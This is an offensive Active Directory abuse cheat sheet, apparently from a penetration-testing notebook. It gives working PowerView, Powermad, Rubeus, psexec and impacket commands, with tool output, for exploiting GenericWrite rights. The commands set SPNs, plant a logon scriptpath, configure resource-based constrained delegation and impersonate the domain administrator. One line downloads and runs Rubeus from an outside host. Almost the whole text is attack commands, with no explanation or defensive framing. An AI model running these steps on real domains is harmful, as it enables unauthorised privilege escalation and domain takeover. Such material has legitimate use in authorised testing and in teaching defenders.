User has GenericWrite over another user
To abuse GenericWrite over a user object, there are two options, shown below.
Import-Module .\Powerview.ps1
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('object.local\smith', $SecPassword)
Set-DomainObject -Credential $Cred -Identity maria -SET @{serviceprincipalname='foobar/xd'}
setspn -a object.local/maria.object.local:1337 object.local\maria
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('object.local\smith', $SecPassword)
cd C:\\Windows\\System32\\spool\\drivers\\color
echo 'whoami > C:\\Windows\\System32\\spool\\drivers\\color\\poc.txt' > foo.ps1
Set-DomainObject -Credential $Cred -Identity maria -SET @{scriptpath='C:\\Windows\\System32\\spool\\drivers\\color\\foo.ps1'}
User / Computer has GenericWrite over computer
PS C:\users\administrator\Desktop> . .\Powermad.ps1
PS C:\users\administrator\Desktop> New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
PS C:\users\administrator\Desktop> $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
PS C:\users\administrator\Desktop> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
PS C:\users\administrator\Desktop> $SDBytes = New-Object byte[] ($SD.BinaryLength)
PS C:\users\administrator\Desktop> $SD.GetBinaryForm($SDBytes, 0)
PS C:\users\administrator\Desktop> Get-DomainComputer TARGET | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
VERBOSE: get-domain
VERBOSE: [Get-DomainSearcher] ...
PS C:\users\administrator\Desktop> curl 192.168.255.255/Rubeus.exe -o Rubeus.exe
PS C:\users\administrator\Desktop> .\Rubeus.exe hash /password:Summer2018! /user:attackersystem /domain:TARGET.ECORP.COM
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Calculate Password Hash(es)
[*] Input password : Summer2018!
[*] Input username : attackersystem
[*] Input domain : ...
[*] Salt : ...
[*] rc4_hmac : <RC4_HMAC>
[*] aes128_cts_hmac_sha1 : ...
[*] aes256_cts_hmac_sha1 : ...
[*] des_cbc_md5 : ...
PS C:\users\administrator\Desktop> .\Rubeus.exe s4u /user:attackersystem$ /rc4:<RC4_HMAC> /impersonateuser:administrator /msdsspn:cifs/TARGET.ECORP.COM /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: S4U
[*] Using rc4_hmac hash: <RC4_HMAC>
[*] Building AS-REQ (w/ preauth) for: 'ECORP.COM\attackersystem$'
[*] Using domain controller: 255.255.255.255:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIF...
[*] Impersonating user 'administrator' to target SPN 'cifs/TARGET.ECORP.COM'
[*] Building S4U2proxy request for service: 'cifs/TARGET.ECORP.COM'
[*] Using domain controller: ...
[*] Sending S4U2proxy request to domain controller ....
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/TARGET.ECORP.COM':
c:\Users\Administrator\Desktop> .\psexec -s \\TARGET.ECORP.COM Powershell -ExecutionPolicy Bypass -File c:\users\administrator\desktop\x.ps1
net time set -S dc01.ecorp.local
impacket-getST -spn cifs/dc01.ecorp.local ecorp/attackersystem\$:'Summer2018!' -impersonate Administrator -dc-ip 192.168.xx.xx
# Export the ticket, then use psexec to access the DC
export KRB5CCNAME=./Administrator.ccache
impacket-psexec -k -target-ip 192.168.xx.xx dc01.ecorp.local